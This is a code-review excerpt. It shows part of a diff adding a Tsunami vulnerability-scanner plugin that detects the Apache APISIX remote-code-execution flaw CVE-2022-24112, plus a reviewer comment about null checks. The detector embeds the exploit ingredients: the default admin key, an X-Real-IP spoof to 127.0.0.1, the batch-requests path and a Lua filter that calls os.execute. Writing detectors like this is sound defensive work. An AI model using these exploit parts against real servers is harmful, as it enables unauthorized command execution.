community/detectors/cve202224112/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202224112/Cve202224112Detector.java

```diff
@@ -0,0 +1,213 @@
+    version = "0.1",
+    description = "This detector checks Apache APISIX RCE (CVE-2022-24112).",
+    author = "yuradoc (yuradoc.research@gmail.com)",
+    bootstrapModule = Cve202224112DetectorBootstrapModule.class)
+public final class Cve202224112Detector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+  private static final String BATCH_REQUEST_PATH = "apisix/batch-requests";
+  private static final String DEFAULT_ADMIN_KEY_TOKEN = "edd1c9f034335f136f87ad84b625c8f1";
+  private static final String X_REAL_IP_BYPASS = "127.0.0.1";
+  private static final String PIPE_REQUEST_PATH = "apisix/admin/routes/rce";
+  private static final String PIPE_REQUEST_BODY_URI =
+          "/rce/" + Long.toHexString(Double.doubleToLongBits(Math.random()));
+  private static final String PIPE_REQUEST_BODY_NAME =
+          Long.toHexString(Double.doubleToLongBits(Math.random()));
+  private static final String FILTER_FUNC_OS_EXEC = "function(vars) return os.execute('echo hello')==true end";
+  private static final String FILTER_FUNC_FALSE = "function(vars) return false end";
+  private final String batchRequestBodyTemplate;
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+
+  @Inject
+  Cve202224112Detector(@UtcClock Clock utcClock, HttpClient httpClient) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+
+    String batchRequestBodyTemplate = "";
+    try {
+      batchRequestBodyTemplate =
+              Resources.toString(
+                      Resources.getResource(this.getClass(), "pipeRequestBody.json"), UTF_8);
+    } catch (IOException e) {
+      logger.atSevere().withCause(e).log(
+              "Should never happen. Couldn't load payload resource file");
+    }
+    this.batchRequestBodyTemplate = batchRequestBodyTemplate;
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("Cve202224112Detector starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  private boolean isServiceVulnerable(NetworkService networkService) {
+    String targetUri = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+
+    if (!isTargetAPISIX(networkService, targetUri))
+      return false;
+
+    for (String filterFunc : new String[] { FILTER_FUNC_OS_EXEC, FILTER_FUNC_FALSE }) {
+      HttpResponse resp = executeBatchRequest(networkService, targetUri, filterFunc);
+      if (!(resp.status().code() == HttpStatus.OK.code()
```

Comment:
You should add a null check here to avoid NPE, in case the request fails and returns null. Same goes for resp check from executeCreatedRouteRequest.

Reply:
Changed to recommendation.